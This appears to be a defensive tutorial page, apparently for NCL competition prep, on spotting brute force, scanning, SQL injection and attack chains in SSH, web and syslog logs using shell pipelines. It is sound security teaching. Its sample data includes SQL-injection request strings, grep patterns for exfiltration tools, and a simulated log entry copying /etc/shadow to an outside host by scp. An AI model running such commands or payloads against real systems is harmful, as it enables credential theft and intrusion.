NCL: Log Analysis
Detecting attacks and anomalies in system logs using grep, awk, and sort
Log analysis challenges give you server log files and ask you to identify attackers, compromised accounts, and malicious activity. This is where your Unix command-line skills from Weeks 1-2 directly translate to cybersecurity — grep, awk, sort, uniq, and cut are the primary tools.
This page covers the three log types tested in NCL: SSH authentication logs, web server access logs, and system logs (syslog). Each section shows the log format, the questions NCL asks, and the exact commands to answer them.
1. SSH Authentication Logs
SSH logs record every login attempt — successful and failed. On Linux, these are in /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL/CentOS).
Log format
A typical SSH log entry:
Mar 15 14:23:05 webserver sshd[12345]: Failed password for admin from 192.168.1.100 port 54321 ssh2
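Fields: month day time hostname process[PID]: message. Split on whitespace, the hostname is $4; in the entry above, the username is $9 and the source IP is $11.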
Common NCL questions and commands
“What is the server hostname?”
grep "sshd" auth.log | head -1 | awk '{print $4}'
“What IP addresses attempted brute force attacks?”
# Count failed attempts per IP, sort by frequency
grep "Failed password" auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head
The output shows IPs ranked by number of failed attempts. An IP with hundreds of failures is conducting a brute force attack.
“What username was targeted?”
grep "Failed password" auth.log | awk '{print $9}' | sort | uniq -c | sort -rn | head
“Which IP successfully authenticated?”
grep "Accepted password" auth.log | awk '{print $11}' | sort -u
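The field positions ($9, $11) depend on the exact message. Failed logins for nonexistent accounts read "Failed password for invalid user NAME from IP ...", which moves the username to $11 and the IP to $13. If the output looks wrong, examine a sample line and adjust: grep "Failed password" auth.log | head -1.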
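One way to avoid hard-coded positions is to count fields from the end of the line. The sketch below assumes every "Failed password" entry ends with "from IP port N ssh2", as in the sample entry; the four log lines are hypothetical sample data, not from a real challenge.

```shell
# Hypothetical sample: two entries for a valid user, two for invalid users.
log=$(mktemp)
cat > "$log" <<'EOF'
Mar 15 14:23:05 webserver sshd[12345]: Failed password for admin from 192.168.1.100 port 54321 ssh2
Mar 15 14:23:07 webserver sshd[12346]: Failed password for invalid user oracle from 192.168.1.100 port 54322 ssh2
Mar 15 14:23:09 webserver sshd[12347]: Failed password for invalid user test from 203.0.113.7 port 40000 ssh2
Mar 15 14:23:11 webserver sshd[12348]: Failed password for admin from 192.168.1.100 port 54323 ssh2
EOF

# Counting from the end: $(NF-3) is the IP, $(NF-5) is the username,
# whether or not "invalid user" appears earlier in the line.
ip_counts=$(grep "Failed password" "$log" | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn)
user_counts=$(grep "Failed password" "$log" | awk '{print $(NF-5)}' | sort | uniq -c | sort -rn)

echo "$ip_counts"
echo "$user_counts"
rm -f "$log"
```

With fixed positions, the two "invalid user" lines would report "oracle" and "test" as IP addresses; counting from the end keeps both columns aligned.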
Checkpoint: A log shows 500 "Failed password for root" entries from 10.0.0.5, followed by one "Accepted password for root" from 10.0.0.5. What happened?
A successful brute force attack. The attacker tried 500 passwords and eventually guessed correctly. The single “Accepted” entry after hundreds of failures is the compromise. You would report 10.0.0.5 as the attacker IP and note that the root account was compromised.
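The "failures followed by a success" pattern can be checked in a single awk pass. This is a minimal sketch: the sample log and the threshold variable min are illustrative assumptions, and it again assumes entries end with "from IP port N ssh2".

```shell
# Hypothetical sample: three failures then a success from one IP,
# plus an unrelated legitimate login.
log=$(mktemp)
cat > "$log" <<'EOF'
Mar 15 02:10:01 webserver sshd[2001]: Failed password for root from 10.0.0.5 port 50001 ssh2
Mar 15 02:10:03 webserver sshd[2002]: Failed password for root from 10.0.0.5 port 50002 ssh2
Mar 15 02:10:05 webserver sshd[2003]: Failed password for root from 10.0.0.5 port 50003 ssh2
Mar 15 02:10:07 webserver sshd[2004]: Accepted password for root from 10.0.0.5 port 50004 ssh2
Mar 15 09:00:00 webserver sshd[2100]: Accepted password for alice from 10.0.0.20 port 51000 ssh2
EOF

# Tally failures per IP; when an "Accepted" line arrives from an IP that has
# already failed at least `min` times, print IP, username, and failure count.
compromised=$(awk -v min=3 '
  /Failed password/   { fails[$(NF-3)]++ }
  /Accepted password/ { ip = $(NF-3); if (fails[ip] >= min) print ip, $(NF-5), fails[ip] }
' "$log")

echo "$compromised"
rm -f "$log"
```

In a real challenge the threshold would be much higher than 3; it is kept small here so the sample stays short.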
2. Web Server Access Logs
Apache and Nginx typically log each HTTP request in Combined Log Format:
192.168.1.50 - - [15/Mar/2025:14:23:05 +0000] "GET /login HTTP/1.1" 200 1234 "https://google.com" "Mozilla/5.0"
Fields: IP identity user [timestamp] "method path protocol" status size "referer" "user-agent". The identity and user fields are usually "-". Split on whitespace, the path is $7 and the status code is $9.
Common NCL questions and commands
“Which IP made the most requests?” (potential DDoS or scanning)
awk '{print $1}' access.log | sort | uniq -c | sort -rn | head
“What paths returned 404?” (directory scanning/enumeration)
grep '" 404 ' access.log | awk '{print $7}' | sort | uniq -c | sort -rn | head
“Were there SQL injection attempts?”
grep -iE "union|select|drop|1=1|'--|;--" access.log
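Query strings in access logs are usually URL-encoded, and a bare keyword such as "select" also matches harmless paths. The sketch below compares the broad pattern with a narrower one; the log lines and the narrower pattern are illustrative assumptions, not a complete SQL injection signature.

```shell
# Hypothetical sample: two injection attempts and one harmless request.
log=$(mktemp)
cat > "$log" <<'EOF'
198.51.100.4 - - [15/Mar/2025:14:25:00 +0000] "GET /item?id=1%27%20OR%201=1-- HTTP/1.1" 200 512 "-" "sqlmap/1.7"
198.51.100.4 - - [15/Mar/2025:14:25:01 +0000] "GET /item?id=1+UNION+SELECT+user,pass+FROM+users HTTP/1.1" 500 0 "-" "sqlmap/1.7"
192.168.1.50 - - [15/Mar/2025:14:25:02 +0000] "GET /products/select-a-plan HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF

# Broad pattern: also matches the harmless /products/select-a-plan request.
broad=$(grep -ciE "union|select|drop|1=1|'--|;--" "$log")

# Narrower pattern: encoded quote (%27), or keywords joined by + or %20.
pattern='%27|union(\+|%20)+select|or(\+|%20)+1=1'
narrow=$(grep -ciE "$pattern" "$log")
suspects=$(grep -iE "$pattern" "$log" | awk '{print $1}' | sort -u)

echo "broad=$broad narrow=$narrow suspects=$suspects"
rm -f "$log"
```

Starting broad and then narrowing is a reasonable workflow: the broad search shows what is in the log, and the narrower one trims false positives before you count IPs.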
“What user agents are unusual?” (bot identification)
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -rn | head
The -F'"' flag sets the field separator to double quotes, which correctly parses the quoted fields in Combined Log Format.
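To see why the quote separator matters, the sketch below splits one line both ways. The user agent string is a made-up example containing spaces; the rest follows the sample entry.

```shell
# One Combined Log Format line with a multi-word user agent (hypothetical).
line='192.168.1.50 - - [15/Mar/2025:14:23:05 +0000] "GET /login HTTP/1.1" 200 1234 "https://google.com" "Mozilla/5.0 (X11; Linux x86_64)"'

# Splitting on double quotes: even-numbered fields are the quoted strings.
request=$(printf '%s\n' "$line" | awk -F'"' '{print $2}')
referer=$(printf '%s\n' "$line" | awk -F'"' '{print $4}')
agent=$(printf '%s\n' "$line" | awk -F'"' '{print $6}')

# Splitting on whitespace cuts the user agent at its first space.
naive=$(printf '%s\n' "$line" | awk '{print $12}')

echo "request: $request"
echo "referer: $referer"
echo "agent:   $agent"
echo "naive:   $naive"
```

The whitespace split returns only the first word of the user agent, with its leading quote still attached, which would fragment the counts in the uniq -c step.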
Checkpoint: You see 200 requests for paths like /admin, /wp-admin, /phpmyadmin, /login, /.env from a single IP, all returning 404. What is this?
Automated directory enumeration (also called directory brute forcing). The attacker is using a tool like dirb or gobuster to find hidden admin panels and configuration files. The 404 responses indicate the paths don’t exist on this server, but the scanning itself is hostile activity.
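Enumeration shows up as one IP producing most of the 404 responses. The sketch below counts 404s per IP with awk; the log lines (including the scanner's user agent) are hypothetical sample data.

```shell
# Hypothetical sample: one scanning IP and one ordinary visitor.
log=$(mktemp)
cat > "$log" <<'EOF'
203.0.113.9 - - [15/Mar/2025:14:23:05 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.9 - - [15/Mar/2025:14:23:05 +0000] "GET /wp-admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.9 - - [15/Mar/2025:14:23:06 +0000] "GET /.env HTTP/1.1" 404 153 "-" "gobuster/3.6"
192.168.1.50 - - [15/Mar/2025:14:23:07 +0000] "GET /login HTTP/1.1" 200 1234 "https://google.com" "Mozilla/5.0"
192.168.1.50 - - [15/Mar/2025:14:23:09 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
EOF

# $1 is the client IP and $9 the status code; tally 404s per IP, highest first.
scanners=$(awk '$9 == 404 { hits[$1]++ } END { for (ip in hits) print hits[ip], ip }' "$log" | sort -rn)

echo "$scanners"
rm -f "$log"
```

A single stray 404 (such as a missing favicon) is normal; it is the volume from one address that marks a scan.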
3. System Logs (syslog)
Syslog entries cover system-wide events: service starts/stops, user account changes, sudo commands, cron jobs, and kernel messages.
Format
Mar 15 14:23:05 hostname process[PID]: message
Incident timeline reconstruction
In NCL, syslog challenges often ask you to reconstruct an attack timeline. The key events to search for:
Initial access:
grep "Accepted\|session opened" syslog | head
Privilege escalation:
grep "sudo" syslog | awk '{print $1, $2, $3, $5, $6}'
Persistence (new accounts):
grep "useradd\|adduser\|usermod" syslog
Data exfiltration:
grep "scp\|wget\|curl\|nc " syslog
Service manipulation:
grep "systemctl\|service.*start\|service.*stop" syslog
Checkpoint: Syslog shows: (1) "Accepted password for www-data" at 02:15, (2) "sudo: www-data : command=/bin/bash" at 02:16, (3) "useradd backdoor" at 02:17, (4) "scp /etc/shadow 10.0.0.99" at 02:18. Describe the attack.
- Initial access at 02:15 — attacker compromised the www-data account (a web service account that should never have SSH access)
- Privilege escalation at 02:16 — www-data used sudo to get a root shell
- Persistence at 02:17 — attacker created a backdoor user account
- Exfiltration at 02:18 — attacker copied the password hash file to an external server
This is a textbook attack chain: access → escalation → persistence → exfiltration, all within 3 minutes.
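The individual searches can be combined into one pass that labels each matching entry with its attack stage. This is a sketch only: the log lines are hypothetical, the stage labels are my own naming, and real syslog messages vary by distribution and by what auditing is enabled.

```shell
# Hypothetical sample modeled on the checkpoint scenario, plus two noise lines.
log=$(mktemp)
cat > "$log" <<'EOF'
Mar 15 02:14:59 web01 CRON[900]: (root) CMD (run-parts /etc/cron.hourly)
Mar 15 02:15:02 web01 sshd[1001]: Accepted password for www-data from 10.0.0.99 port 40022 ssh2
Mar 15 02:16:10 web01 sudo: www-data : TTY=pts/0 ; PWD=/var/www ; USER=root ; COMMAND=/bin/bash
Mar 15 02:17:31 web01 useradd[1042]: new user: name=backdoor, UID=1001, GID=1001, home=/home/backdoor, shell=/bin/bash
Mar 15 02:18:05 web01 sudo: backdoor : TTY=pts/1 ; PWD=/home/backdoor ; USER=root ; COMMAND=/usr/bin/scp /etc/shadow 10.0.0.99:/tmp/
Mar 15 02:19:00 web01 kernel: [ 1234.5] eth0: link up
EOF

# First matching rule wins; the exfiltration rule comes before the generic
# sudo rule so that "sudo ... scp" is not labeled as escalation.
timeline=$(awk '
  /Accepted/                    { print $3, "initial-access"; next }
  /COMMAND=.*(scp|wget|curl)/   { print $3, "exfiltration"; next }
  /sudo:/                       { print $3, "privilege-escalation"; next }
  /useradd|adduser/             { print $3, "persistence"; next }
' "$log")

echo "$timeline"
rm -f "$log"
```

Because syslog is already in chronological order, the labeled output reads directly as the attack timeline.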
4. Log Analysis Patterns
Regardless of log type, the same sort | uniq -c | sort -rn pipeline answers most frequency questions:
# Generic pattern: extract field, count, rank
COMMAND_TO_EXTRACT_FIELD | sort | uniq -c | sort -rn | head
- sort: groups identical lines together (required before uniq)
- uniq -c: counts consecutive identical lines
- sort -rn: sorts numerically in reverse (highest count first)
- head: shows only the top results
This pipeline works for IPs, usernames, paths, user agents, or any repeated field.
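A small demonstration of why the first sort is required: uniq only merges adjacent duplicates, so unsorted input produces fragmented counts. The IP list is made-up sample input.

```shell
# Six hypothetical entries: 10.0.0.5 appears four times, 10.0.0.9 twice.
ips=$(printf '%s\n' 10.0.0.5 10.0.0.9 10.0.0.5 10.0.0.5 10.0.0.9 10.0.0.5)

# Without sort, uniq -c sees five separate runs instead of two groups.
unsorted_groups=$(printf '%s\n' "$ips" | uniq -c | awk 'END {print NR}')

# With sort first, each value is counted once; awk trims uniq's padding.
ranked=$(printf '%s\n' "$ips" | sort | uniq -c | sort -rn | awk '{print $1, $2}')

echo "groups without sort: $unsorted_groups"
echo "$ranked"
```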
Time-based analysis
To filter log entries by time range:
# Entries from 14:00:00 through 14:59:59 (the surrounding spaces anchor the match to the timestamp field)
grep " 14:[0-5][0-9]:[0-5][0-9] " auth.log
# Entries on March 15 (syslog pads single-digit days with a space, e.g. "Mar  5")
grep "Mar 15" auth.log
# Entries outside business hours (before 6 AM or after 10 PM)
awk '{split($3,t,":"); h=t[1]+0; if (h<6 || h>=22) print}' auth.log
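For arbitrary time windows, awk can compare the timestamp field directly: zero-padded HH:MM:SS strings sort in time order, so plain string comparison works. The sample entries and the variable names lo and hi are assumptions for illustration.

```shell
# Hypothetical sample covering the boundaries of both filters.
log=$(mktemp)
cat > "$log" <<'EOF'
Mar 15 05:59:59 webserver sshd[3001]: Failed password for root from 10.0.0.5 port 50001 ssh2
Mar 15 06:00:00 webserver sshd[3002]: Failed password for root from 10.0.0.5 port 50002 ssh2
Mar 15 14:00:00 webserver sshd[3003]: Failed password for root from 10.0.0.5 port 50003 ssh2
Mar 15 14:30:10 webserver sshd[3004]: Failed password for root from 10.0.0.5 port 50004 ssh2
Mar 15 15:00:00 webserver sshd[3005]: Failed password for root from 10.0.0.5 port 50005 ssh2
Mar 15 22:00:00 webserver sshd[3006]: Failed password for root from 10.0.0.5 port 50006 ssh2
Mar 15 23:15:00 webserver sshd[3007]: Failed password for root from 10.0.0.5 port 50007 ssh2
EOF

# Inclusive window on the time field ($3), compared as strings.
window=$(awk -v lo="14:00:00" -v hi="14:59:59" '$3 >= lo && $3 <= hi {print $3}' "$log")

# Outside business hours: before 06:00 or from 22:00 onward.
after_hours=$(awk '{ split($3, t, ":"); h = t[1] + 0; if (h < 6 || h >= 22) print $3 }' "$log")

echo "$window"
echo "$after_hours"
rm -f "$log"
```

Note that this compares times only; a log spanning several days also needs a filter on the month and day fields.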
Resources
Practice: Blue Team Labs Online (free tier with log challenges) · Splunk BOTS (real-world SOC scenarios)
Reference: Apache Log Format · SSH Log Analysis